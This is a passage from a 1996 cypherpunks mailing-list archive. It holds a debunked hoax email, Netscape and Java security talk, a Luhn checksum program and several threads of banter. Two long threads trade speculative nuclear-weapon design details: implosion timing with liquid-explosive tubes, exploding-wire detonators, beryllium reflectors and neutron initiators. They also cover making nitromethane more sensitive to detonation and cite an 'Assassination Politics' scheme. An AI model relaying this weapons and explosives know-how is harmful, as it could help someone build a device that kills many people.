Message-ID: <QQadzt24150.199602221015@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


This looks completely, totally, and insanely bogus, but I
need some kind of verification for this bizarre little
piece of mail that somehow ended up in my mailbox.

Anybody from MIT ever heard of "Kim Dereksen"?

dave "I'm busy laughing, can you call back?"

 *** Attention ***

 It's that time again!

 As many of you know, each leap year the Internet must be shut down for 24
 hours in order to allow us to clean it.  The cleaning process, which
 eliminates dead email and inactive ftp, www and gopher sites, allows for
 a better-working and faster Internet.

 This year, the cleaning process will take place from 12:01 a.m. GMT on
 Feb. 29 until 12:01 a.m. GMT on March 1.  During that 24-hour period,
 five powerful Internet-crawling robots situated around the world will
 search the Internet and delete any data that they find.

 In order to protect your valuable data from deletion we ask that you do
 the following:

 1.  Disconnect all terminals and local area networks from their Internet
 connections.

 2.  Shut down all Internet servers, or disconnect them from the Internet.

 3.  Disconnect all disks and hardrives from any connections to the
 Internet.

 4.  Refrain from connecting any computer to the Internet in any way.

 We understand the inconvenience that this may cause some Internet users,
 and we apologize.  However, we are certain that any inconveniences will
 be more than made up for by the increased speed and efficiency of the
 Internet, once it has been cleared of electronic flotsam and jetsam.

 We thank you for your cooperation.

 Kim Dereksen
 Interconnected Network Maintenance staff
 Main branch, Massachusetts Institute of Technology

 Sysops and others:  Since the last Internet cleaning, the number of
 Internet users has grown dramatically.  Please assist us in alerting the
 public of the upcoming Internet cleaning by posting this message where
 your users will be able to read it.  Please pass this message on to other
 sysops and Internet users as well.  Thank you.
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net,  dave@nym.alias.net,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 18:21:17 +0800
Subject: No Subject
Message-ID: <QQadzt24322.199602221017@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


lmccarth@cs.umass.edu wrote:
> 
> Wayne Madsen wrote somewhere:
> > A knowledgeable government source claims that
> > the NSA has concluded agreements with [...] Netscape to
> > permit the introduction of the means to prevent the anonymity of
> > Internet electronic mail, [...]
> 
> I suspect this may actually mean that they're pushing Netscape to
> incorporate cryptographic authentication into browser email, which I think is
> a useful development. I'm not aware of any public remailers previously
> operated by Netscape Communications Corp. that have now shut down. ;)

  Actually I believe that the quote from Madsen is his overblowing and
misinterpretation of our agreement to sell the government fortezza enabled
products.  There is no agreement that I know of between us and the NSA
regarding anonymity or e-mail.  Since I'm the one doing the code, someone
had better tell me if there is...

> At any rate, it's an excuse for me to ask some questions:
> 
> (0) I'm not aware of any class library objects or methods in stand-alone Java
> for calling the local mail transport agent. Is there any class library
> support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool,
> etc.} for applet calls to the local mail agent that's configured in the
> browser ?
> 
> I would prefer not to reimplement SMTP using the Socket class in my own
> applets. Ideally I'd like to have an applet that presents a form with some
> entry boxes and check boxes, quantizes and encrypts the input according to
> the check box settings, and spews the resulting byte streams to the MTA.

  We do not curently allow Java to get access to our mail subsystem.

> (1) As I recall, I used to be able to set (as an Option) the path and name of
> the local MTA (e.g. /usr/lib/sendmail) in an earlier version of Netscape.
> That seems to have disappeared in Navigator 2.0. Is there indeed no longer a
> way to set that ?
> 
> It occurs to me that we could have achieved partial integration of
> remailing into Navigator quite cheaply with that option.

  I believe that we have always spoken SMTP via direct connection to port 25
on your designated mail server.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 18:24:12 +0800
Subject: No Subject
Message-ID: <QQadzt24454.199602221020@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri

I was musing over this phrase, "a government rules by consent of the =
governed"   [.......]
does it mean, "majority of the governed?" how exactly is consent =
expressed?
........................................................................=
...............

.  How exactly is consent extractedH^H^H^H^H^H^ requested?

.  When exactly is consent identified?=20

.  How exactly is government applied to the consentees?=20
   (caning, jailing, fines, etc.)

.  How exactly do consentors change methodologies when they suddenly =
realize that they, too, can be subject to their own device?

.  Why should non-consenting citizens live with governing methods which =
in fact conflict with the pursuit of those three human virtues:  life, =
liberty, happiness?

Supposedly, government is devised for ruling the "unruly";  a matter for =
definition and (dis)agreement which can provide endless hours of =
amusement for authoritarians, especially in court.

I hear tell that many who are no longer amused are now learning the many =
uses of encryption.  Thus the list. =20

(end of my comments)
    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 18:28:18 +0800
Subject: No Subject
Message-ID: <QQadzt24636.199602221023@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


David E. Smith forwarded:
[...]
>  Please assist us in alerting the
>  public of the upcoming Internet cleaning by posting this message where
>  your users will be able to read it.  Please pass this message on to other
>  sysops and Internet users as well.  Thank you.

Batten down the hatches, mateys, this one's gonna be drenching us for the next
week....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 23 Feb 1996 02:26:56 +0800
Subject: No Subject
Message-ID: <QQadzv26197.199602221046@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, Brian Davis wrote:

> On Mon, 19 Feb 1996, jim bell wrote:
> 
> > it just didn't occur to me that you'd object to this.  "Nettiquette" is new
> > to me.                                                  ^^^^^^^^^^^^^^^^^^ > 
>   ^^^^^^
> 
> No shit.

So, it would seem, is nuclear weapons design.

> 
> > Jim Bell
> > 
> > jimbell@pacifier.com.
> 
> EBD
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 23 Feb 1996 02:26:43 +0800
Subject: No Subject
Message-ID: <QQadzv26382.199602221050@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> This looks completely, totally, and insanely bogus, but I need some
> kind of verification for this bizarre little piece of mail that
> somehow ended up in my mailbox.

If you really need verification, there's no one with the last name of
"Dereksen" on MIT's directory (which lists students and staff; "finger
dereksen@mit.edu"), and there's certainly no departments at MIT called
the "Main branch" or "Interconnected Network Maintenance staff".

At least this one is funny.  I particular like the beginning: "It's
that time again!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 18:57:45 +0800
Subject: No Subject
Message-ID: <QQadzv26469.199602221051@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Feb 1996, KarL MarX wrote:

> The application is written in Visual Basic and I could probably get a copy
> of the compiled (well VB is actually interpreted, but that's neither here or
> there) .EXE file....

It would be much more useful to see the actual source code...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 18:58:28 +0800
Subject: No Subject
Message-ID: <QQadzv26493.199602221052@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 2/21/96 -0500, Black Unicorn wrote:
>On Sun, 18 Feb 1996, jim bell wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> 
>> At 10:25 PM 2/18/96 EDT, E. ALLEN SMITH wrote:
>> >	I've been kind of busy recently (the reason I haven't responded to
>> >the more recent Assasination Politics stuff), but I'm curious what 
>> >your method is for achieving simultaneous explosions.
>> 
>> 
>> "Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
>> homogenous liquid 
>> explosive (for example, pure nitromethane), length accurately cut to produce 
>> the exactly desired delay.  Kept separated from each other by foam spacers 
>> to avoid inter-fiber detonations. Detonated from a single cap, with an 
>> intermediary chamber of liquid explosive to stabilize the shock front, the 
>> detonation wave travels along each tube simultaneously at (presumably) 
>> identical velocity."
>
>This method is so dependent on the uniformity of the initiator (the cap 
>in this instance) as to be nearly useless.  Normal blasting caps do not 
>detonate with the uniformity required to initiate each of the tube paths 
>at the same time.  In the off chance that you contemplated surrounding 
>the cap with liquid explosive of a sufficent type, (which still wouldn't 
>assure proper uniformity with any certainty as the liquid explosive is as 
>likely to detonate slightly off left to right as up to down) you still have 
>extremely difficult problems to overcome.

Re-read my whole statement.  I copy the relevant commentary that you
sloppily forgot to read:

>> Detonated from a single cap, with an 
>> intermediary chamber of liquid explosive to stabilize the shock front,

I already entirely anticipated your objection.  And destroyed it.

>1>  Interference from the milling shape and accuracy of the openings to 
>the tubes containing the liquid explosive.

Quantify, quantify.  How much of a problem?  (Hint:  If you seriously 
believed there was a problem with this idea, you would be able to give a few 
examples on how to avoid them.  Reading your commentary, you did none of 
this.  

>2>  Mild to obscure impurities in the liquid explosives causing 
>differences in velocity with respect to other tubes. 

All the tubes can be filled at the last minute by pulling a vacuum on the
system and letting atmospheric pressure fill all the tubes.  No impurities,
or at least it's a perfectly homogeneous mixture.

> Even small changes 
>in pressures within the tubes might cause enough timing problems to make 
>uniform initiation of the primary high explosive assembly impossible.

"might"?  Well, could you be more specific?  How many nanoseconds would be
too many?


>3>  Interference from the milling shape and accuracy of the terminus of 
>the tubes containing the liquid explosive.

So what's your point?

>4>  Overpressure in the device causing premature detonation of the near 
>portion of the high explosive assembly.

Sure about that?

>All of these might cause enough timing error to prevent uniform pressure 
>and thus prevent uniform compression and make supercriticality impossible.

Pigs might fly.

>Remember, kryonic switiches are necessary even when dealing with the 
>speeds of electric conductivity.  The velocities of even hydrazine based 
>explosives are signigicantly lower.  The margin for error is similarly lower.

How low?  Be specific.

>Plutonium gun is still the easiest method for the home grown nuclear 
>device, even if it requires more fissile material.

The "gun" design wasn't used with the plutonium, because IT WOULD NOT HAVE 
WORKED! "Fat Man," the bomb dropped on Nagasaki, used the implosion method.  
"Little Boy," the gun-method bomb, used U-235.   Plutonium detonates far too 
rapidly to use the "gun" method.   The 
scientists knew that in 1945.  You seem to be at least 50 years behind the 
times.

Sheesh!  I guess we now know what field YOU don't know about, huh?  Or, 
perhaps more likely, this is a specific DIS-information campaign.   You want 
someone to waste a critical-mass worth of plutonium.   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:07:26 +0800
Subject: No Subject
Message-ID: <QQadzw27096.199602221100@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Well, folks, I told you so. Sorry to be nasty about it.

> Date: Sun, 18 Feb 1996 23:57:02 -0500
> From: Drew Dean <ddean@CS.Princeton.EDU>
> Subject: Java security problems
> 
> We have discovered a serious security problem with Netscape Navigator's 2.0
> Java implementation.  (The problem is also present in the 1.0 release of the
> Java Development Kit from Sun.)  An applet is normally allowed to connect
> only to the host from which it was loaded.  However, this restriction is not
> properly enforced.  A malicious applet can open a connection to an arbitrary
> host on the Internet.  At this point, bugs in any TCP/IP-based network
> service can be exploited.  We have implemented (as a proof of concept) an
> exploitation of an old sendmail bug.
[...]
> A second, also serious, bug exists in javap, the bytecode
> disassembler.  An overly long method name can overflow a stack
> allocated buffer, potentially causing arbitrary native code to be
> executed.  The problem is an unchecked sprintf() call, just like the
> syslog(3) problem last year.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:15:14 +0800
Subject: No Subject
Message-ID: <QQadzw27670.199602221108@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Finally, an honest man at IPG. Y'all are a hoot. I'll hire you as bozos 
for my kid's next birthday party. 
ROTFL

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

 

 On Wed, 21 Feb 1996, IPG Sales wrote:

> We fess up - we are pig farmers from TexasL, we never have been to 
> these high fluting things you call schools, so we do not even 
> know what you are talking about, much less anything about Cryptography.
> 
> On Wed, 21 Feb 1996, Arley Carter wrote:
> 
> > On Tue, 20 Feb 1996, IPG Sales wrote:
> > 
> > Fess up guys. You are either:
> > 
> > 1.  A team of undergrads or graduate students conducting an "exploit". 
> > 2.  A Detweiller tentacle. Dr. FC ?
> > 3.  The return of Alice D'nonymous ?
> > 4.  The reason the coderpunks lists was started.
> > 
> > You've got to be ROTFL. 
> > See my sig.
> > 
> > Arley Carter
> > Tradewinds Technologies, Inc.
> > email: ac@hawk.twinds.com
> > www: http://www.twinds.com
> > 
> > "Trust me. This is a secure product. I'm from <insert your favorite 
> > corporation or government agency>."
> >  
> Appreciately,
> 
> Ralph
> 
> > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > >  
> > >      
> > > 
> > > 
> > > 
> > >     
> > > 
> > > 
> > > 
> > > 
> > > 
> > 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 23 Feb 1996 02:27:00 +0800
Subject: No Subject
Message-ID: <QQadzw27787.199602221110@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> > Is there something like a checksum attached to Credit Card
> > Numbers. Or better: Is there a way to determine for a given
> > number N if
> >   -this _might_ be a valid number
> >   -this can't be a valid number

This was posted by Wayne D. Hoxsie Jr. <hoxsiew@crl.com>:

#include <stdio.h>

v(char *s)
{
  int i=0,j=0,k;

  k=!(!s[16]);
  for(;*s;*s++)
    i+=(++j%2-k)?(*s-'0')*2>9?((*s-'0')*2)-9:(*s-'0')*2:*s-'0';
  return (i%10);
}
main()
{
  char s[160];

  printf("Enter credit card number\n");
  scanf("%s",s);
  printf("Credit card number is %svalid\n",v(s)?"in":"");
}

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:18:47 +0800
Subject: No Subject
Message-ID: <QQadzw27893.199602221112@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 PM 2/21/96 -0800, tcmay@got.net (Timothy C. May) wrote:

>* Coderpunks -- number theory, DES, Haval, C/C++/Java, IETF and TCP/IP
>stuff, digital signatures, crypto libraries and APIs, Diffie-Hellman,
>BSAFE, RSAREF, etc.
>
>* Cypherpunks -- nuclear bomb triggers, why women are more free under the
>will of Allah than in Western decadent societies, movie reviews, SS
>Obergruppenfuhrer Zimmermann, Zambian newspapers, alien bases in
>Antarctica, Himalayan treks, etc.

Pretty much, yep. The only part of this that really annoys me is that there
isn't currently any real place to talk about actual crypto matters from a
user's point of view.

Sure, I can carve out space for myself on my own Web pages to talk about the
things that interest/concern me - and I have - but it's tough to find
anyplace to _learn_ in any way except random experimentation. And sure, if I
could read C well enough to puzzle through the remailer code and had the
UNIX knowledge necessary to compile and run one myself, for instance, I
could answer all my questions about remailer operation. But I don't. And I
wish I didn't have to. Unfortunately, there seems to be a huge gap between
the tiny handful of people who create the stuff and the bulk of us who are
merely interested in using it.

At this point, I acknowledge that I'm reinventing Alan's screed about how
"cypherpunks teach" should be as true as "cypherpunks write code". If more
people don't work on bridging the aforementioned gap, smart people of good
will who happen to be occupied enough with other things not to be able (or
interested) to become themselves good programmers and cryptographers are SOL.
 

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:26:53 +0800
Subject: No Subject
Message-ID: <QQadzx28492.199602221121@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Dave Merriman writes:
> could someone point me at the 'specs' for Mixmaster remailers? 
> I'm after how messages are sliced, diced, repackaged, and shipped, etc.

http://www.obscura.com/~loki/remailer/remailer-essay.html

Funky things are apparently happening with the obscura DNS records etc. due to
some equipment moves Lance is doing, so you may or may not find this 
convenient to retrieve at the moment.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:31:26 +0800
Subject: No Subject
Message-ID: <QQadzx28893.199602221125@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Feb 1996, Robert Hettinga wrote:

> >I'm sufficiently impressed with the arguments against name credentials
> >that Carl Ellison has made that I'm looking seriously into systems
> >that don't do any sort of conventional certificate binding at all...
> 
> ... and I bet, Wei Dai's contentions to the contrary, that they'll be
> *cheaper* to use than those which do certificate binding, all other things
> being equal.

You got my position completely backward on this.  I've always supported 
Carl's arguments in the past on this issue (for example see the tread 
"subjective names...").  You may be thinking of what I said about the 
cost of defeating traffic analysis.

The natural state of the Net seems to be a kind of semi-anonymity.  
Trying to push it in either direction (complete traceability or 
anonymity) is costly.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:35:56 +0800
Subject: No Subject
Message-ID: <QQadzy29206.199602221131@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales <ipgsales@cyberstation.net> wrote:

>  See my reply to Tim Phillip - it is checked extensively 
> 
> If the algorithm sucks, prove it - please read the messages back and 

See my comment below.
[..]
> > [..]
> > > In general, you will find the kernel of the propgations consists of 64
> > > equation sets of the form:
> > > 
> > >        Bi=(Bi+Ci MOD Di) Mod 256             Large prime numbers
> > >        ENCRYPTEXTi=OTP[Bi] XOR PLAINTEXTi    Encryption
> > >        OTP[Bi]=ENCRYPTEXTi                   Makes the OTP Dynamic
> > 
> > Bah. Looks to me like simple garbling, only using a large stream.
> > 
> > Encrypt a stream of zeros with that method, and you'll get repeated
> > strings of OTP[Bi]'s.  An unsophisticated high school student could
> > crack that.


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 23 Feb 1996 02:47:06 +0800
Subject: No Subject
Message-ID: <QQadzy29491.199602221135@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 2/21/96 -0500, Black Unicorn wrote:
>On Mon, 19 Feb 1996, Brian Davis wrote:
>
>> On Mon, 19 Feb 1996, jim bell wrote:
>> 
>> > it just didn't occur to me that you'd object to this.  "Nettiquette" is new
>> > to me.
^^^^^^^^^^^^^^^^^^ > 
>>   ^^^^^^
>> 
>> No shit.
>
>So, it would seem, is nuclear weapons design.

I wrote this just a few hours ago.  Let's have a vote:  Who thinks I have 
some idea about the subject?


>> A hell of a lot easier, I'm sure!  Multiple krytrons and coaxial capacitors 
>> is WAY too complicated.
>
>I've often wondered why not one circuit and all in series. If you had
>enough juice to fire them all, the exploding wire forms a conductive
>plasma to maintain the circuit. That, as I understand it, is what makes
>them so effective. Is it just a power limitation, or would it be
>impossible to match up the resistances between the wires well enough to
>get the proper timing?

It's probably a partly practical consideration.  For a given (reasonable) 
size of wire, it's going to take a certain amount of current to explode it 
sufficiently rapidly, and that translates into an approximate voltage.  For 
argument's sake, assume that the voltage necessary is 5000 volts.  (I don't 
know what the "real" number is...)  Capacitors of 5000 volts are reasonably 
easily "doable."  However, if you try to hook all those wires together, and 
if you have a couple of dozen trigger locations, that works out to 125,000 
volts total, which is a rather impractically high voltage for "routine" use. 
(to say nothing of the ability to SWITCH such high voltages).   I suspect 
that "parts availability" drives nuclear detonators just as it does most 
more innocuous electronics. 'course, their budgets are a lot higher!

In addition (and this is probably at least as important a reason, if not 
more so),  if you put multiple wires in series, while the current through 
them is equal, the voltage across each one may vary.  Thus, the energy put 
into each wire will also vary, and those where the voltage is higher get 
more power, and get hotter, and higher resistance, and more voltage, and 
more power, etc.

In other words, it's an unstable equilibrium, and this would almost 
certainly lead to a situation where some some triggers happened 
substantially later than the others.  Putting them all in PARALLEL would 
avoid this, sorta, but that has its own problems.

>> That's right, the "lenses" would still be necessary. I'm not clear on what 
>> kind of "transformer" they use to efficiently couple the blast energy into 
>> the dense plutonium;  I would guess that it would be the shock-wave 
>> equivalent of an "anti-reflection coating," which might require a material 
>> with the geometric mean of the mechanical impedance between the detonating 
>> explosive and the plutonium. 
>
>Well, there is a spacer or air gap between the core and "hammer" but
>I've never read what the hammer is made of. This part could be
>simulated in one dimension, and an optimization function used to find
>the best density. 

A few weeks ago, I downloaded a GIF of the H-bomb, and it shows an element 
which it referred to as a "shock absorber" (at the appropriate location)and 
identified the material as graphite.  Graphite is very stiff; a high modulus 
of elasticity (Young's modulus).  But it isn't very dense.  I would imagine 
that the velocity of sound in graphite is about as high as you can get in a 
solid material.  I haven't done any math to determine how effective a match 
this would be, but maybe it doesn't really matter.

Oh, one more thing.  What the lay person (or even the person who THINKS he 
"knows it all", as opposed to US, who do.  <G>!) doesn't realize about bomb
design 
is that the "highest tech" bombs are not the largest, but are in fact the 
SMALLEST bombs.  Chances are good that a Hiroshima-sized bomb was just about 
the smallest that was technically do-able in the 1940's.   I would imagine 
that most of the work that has gone into bomb design in the last 30 years 
has been the technology to develop smaller (LESS explosive power) bombs,  
aside from making them physically small enough to fit in a launch bus.

I forgot about the beryllium.  Beryllium, I understand, is described as a 
"neutron reflector".   Now how GOOD a neutron reflector it is I don't know, 
but if you're trying to make a bomb with the smallest amount of material at 
the primary's core it would help a great deal to have a neutron reflector.  
Presumably, it would be used to coat the inside of the "hammer."  If 
beryllium were a "perfect" neutron reflector, you could use arbitrarily low 
amounts of plutonium or U-235 as the core (analogy:  If you were in a room 
with walls which were perfect mirrors, and "you" were invisible, you would 
see "forever" and the volume of space you were in would appear to be 
infinite), and you could make the core as small as you want.  (But it isn't, 
so the improvement effected by beryllium is limited.)

It might also help to make the "pit" hollow, but I don't know about that.  
This might assist in the mechanical impedance match, too.  If you could get 
the chemical implosion timed  "just right" you might be able to get away 
with using a really THIN layer of plutonium that crashes together at the 
core.  This might provide optimum densification because you would be able to 
accelerate the hollow plutonium sphere centrally at near-detonation-velocity 
speeds, which would result in very effective density increases.

There is also supposed to be a beam trigger in modern bombs.  It ionizes
helium to 
form alphas, which are fired at beryllium targets which releases neutrons at 
"just the right time" to start the compacted core going at just the right 
time.  (More on this if you're interested...)


(BTW, keep in mind as you read what I'm writing that I've never had a nuke-E 
course, never talked to a bomb maker or anyone who ever talked to one (and 
probably never talked to anyone who talked to a person who talked to a 
bomb-maker, etc), have had zero access to classified information of any type 
(including non-nuclear).   So take what I'm saying with a grain of sodium 
chloride.  

Actually, I'm not particularly interested in bomb design anyway, so I really 
don't know why I started this thread?!?  <G>


>Using high-density explosives (RDX/HMX based I would
>think) would provide a better 'impedance match'.

That's probably true, but it's still likely to be a very mismatched system.  
The density of plutonium is really high.  Now we know why computers were so 
important in the 1960's and 1970's to bomb design (and still are, I guess!): 
 Doing a quasi-3 dimensional simulation of the trigger is vastly cheaper 
than actually exploding a bomb, and you can get far more information from 
the simulation as well.  Probably the only reason they kept setting off real 
bombs was to ensure that their mathematics represented reality. (Well, also 
to test the reliability of "working" warheads...)

BTW, a few years ago I heard about a new explosive material, 
octanitrocubane.  If you are familiar with chemistry, you'll suspect from 
the name what it is:  A cube-shaped arrangement of eight carbon atoms, each 
connected to a nitro (NOT nitrate) group.  It has at least two things going 
for it:

1.  It is stoichiometric internal to the molecule.

2.  It has ENORMOUS ring strain, which translates into a dramatically 
greater detonation energy.    It is probably the current record-holder for 
carbon/nitrogen/hydrogen/oxygen explosives, by a long shot.

Its main disadvantage is predictable, if you know any organic chemistry:  It 
is an extremely difficult compound to synthesize, or at least to develop the 
synthesis for.  Thus, it is probably exceedingly expensive.  That means that 
for "ordinary" use, almost any common explosive is better.  This material is 
only going to be practical for the "highest-level" usages of explosives, and 
nuclear detonators are one of these.  Of course, since we're DISMANTLING 
bombs and not building them (at least as much as we used to!) then new 
technology to build bombs isn't  particularly useful.  I'm "sure" Los Alamos 
has probably simulated an octanitrocubane-triggered bomb, for curiosity's 
sake if nothing else.  


>Also, how do they keep the core at the exact center of the air gap?
>Thin wires or pins to hold it there? Or is the "gap" actually some
>Styrofoam-like low-density but rigid material?

The B-28 (?) H-bomb GIF identified this gap as being "vacuum," but we know 
there is no reason to have an actual vacuum there.  In fact, as I have read, 
plutonium "pits" get warm to the touch due to radioactive decay.  If it were 
REALLY put in a "vacuum" it would be so well insulated that it would get 
EXTREMELY hot before radiative cooling equilibrated the temperature.  Since 
air is 99.9% of the way to a perfect vacuum compared to a solid, air (in a 
foam) is plausible, like a harder version of styrofoam.  Plenty of such 
foams exist today.  And it's possible they augment and stabilize the 
position by embedding a few relatively thin carbon rods radially between the 
pit and the hammer.

>Interesting that in 'The Curve of Binding Energy' the author hinted at
>this as in "I can't be specific, but I can say this: if you drive a
>nail, do you put the hammer against the nail and push?" At that time,
>it (the air gap) was still classified. Now it's widely known.

After a while, things become obvious, don't they?

Even so, and even though my "mechanical engineering" background is weak, I 
find it hard to believe that modern technology can't provide some sort of 
"graded impedance" covering that acts like a broadband anti-reflection 
coating.  (the mechanical equivalent to the covering for the Stealth bomber 
and fighter plane.)   The main problem would have been simulating such a 
complex material on a computer, at least in the 1960's.  Something tells me 
they would have pursued this at least theoretically,  perhaps lacking 
anything else to do.

The real problem, it seems to me, is that to do this simulation would 
require a pressure-versus-density curve for plutonium up to nearly a million 
atmospheres.  This is, of course, hard to test, and that is one reason it 
would be useful to have deeper atomic physics background.  Perhaps 
physicists would have been able to estimate such a curve on theoretical grounds.


>In reading about this one gets the feeling that bomb design is as much
>art as science, and that if a reasonably sharp person had the
>opportunity to experiment, with real explosives but not necessarily
>real plutonium, they would get the hang of it after a while.

That's exactly what computer simulation is intended to avoid the need for.  
I'm sure instrumentation is a real headache for the testers.

>Alternatively, a Nuclear Bomb Construction Kit - a freeware program
>that helps you to accurately design and play with simulated bombs -
>would be a very interesting political experiment. Combine this with a
>searchable database of available information on the subject. There must
>be lots of publicly available information that, combined and made
>searchable, would be of considerable help to the prospective
>bomb-maker. That would make one hell of a thesis for someone, if
>nothing else.

But not for me.  I have no "nuke E" credentials, and don't enjoy 
programming, and I'm busily working on my "Assassination Politics" debate.  
(which, incidentally, will (I believe) force the dismantling of all nuclear 
weapons in the world, if you've followed the debate, as well as eliminating 
all wars and militaries and governments.  Tell me, who do you think will win?)


>> You're pretty sharp; the version I've read is that amines (substituted 
>> ammonia, but possibly ammonia as well) makes nitromethane 
>> supersonic-rifle-bullet sensitive, but just barely.  Haven't tried this, 
>> however.  I would imagine that a blasting cap would set off pure 
>> nitromethane with no amine contamination at all.
>
>Let's see: Nitromethane and sawdust gives you a medium-power explosive
>that requires a compound detonator. 

Why put it in sawdust?  The only reason I can think of is to keep it from 
